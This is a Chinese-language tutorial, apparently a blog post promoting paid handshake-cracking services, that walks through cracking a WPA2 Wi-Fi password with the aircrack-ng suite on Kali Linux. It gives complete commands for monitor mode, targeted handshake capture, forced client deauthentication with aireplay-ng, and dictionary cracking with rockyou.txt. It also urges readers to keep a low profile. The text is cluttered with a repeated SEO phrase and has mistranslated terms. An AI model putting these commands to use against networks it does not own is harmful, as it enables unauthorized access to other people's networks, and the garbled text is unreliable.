kali linux 网络渗透工具aircrack-ng

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

ifconfig wlan0 up
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon

握手包怎么解析密码原理

airmon-ng start wlan0

握手包怎么解析密码原理

airodump-ng wlan0mon

握手包怎么解析密码原理

airodump-ng -c 11 --bssid B8:F8:83:32:17:60 -w ~/ wlan0mon

握手包怎么解析密码原理握手包怎么解析密码原理

aireplay-ng -0 10 -a B8:F8:83:32:17:60 -c 1C:91:48:A9:48:FD wlan0mon

重新配置无线网卡以启用监控模式,然后搜索可用的Wi-Fi网络并捕获设备连接时的握手包。以下是参数的解释:

  • 使用-c参数指定信道,根据目标路由器所在的信道进行设置。
  • 使用–bssid参数指定目标路由器的MAC地址。
  • 使用-w参数指定握手包的保存路径。

请注意,握手包只有在设备与路由器的Wi-Fi连接时才会生成。如果没有设备连接,那么就需要等待。然而,我们不喜欢等待,所以我们可以使用一条断网命令。该命令利用向连接Wi-Fi的设备发送反证包的原理,使设备断开Wi-Fi连接。一旦设备重新连接Wi-Fi,我们就可以捕获到握手包。(由于这是我自己的网络,所以我能够捕获到握手包,这里就不再附上截图了)

握手包怎么解析密码原理

参数解释:

  • 使用-0表示进行反证攻击。
  • 使用10表示一次发送10个反证包。
  • 使用-a表示目标路由器的MAC地址。
  • 使用-c表示目标设备的MAC地址。

如果发送反证包后仍然无法捕获握手包,那么可以尝试发送更多的包或多次发送。成功捕获握手包的效果如下:

airmon-ng stop wlan0mon

握手包怎么解析密码原理

aircrack-ng -a2 -b B8:F8:83:32:17:60 -w /usr/share/wordlists/rockyou.txt ~/*.cap

握手包怎么解析密码原理握手包怎么解析密码原理

一旦捕获到握手包,可以使用Ctrl+C停止捕包,并关闭无线网卡的监控模式。命令如下:

monitor disable 表示监控模式已关闭。

我们捕获到的握手包就在这里:

利用捕获到的握手包进行密码破解。以下是参数的解释:

  • 使用-a2表示WPA2的握手包。
  • 使用-b表示目标路由器的MAC地址。
  • 使用-w表示字典文件的路径。
  • 最后一个参数是捕获到的握手包。

使用字典文件进行暴力破解,下面是成功的示例:

握手包怎么解析密码原理

赞(0)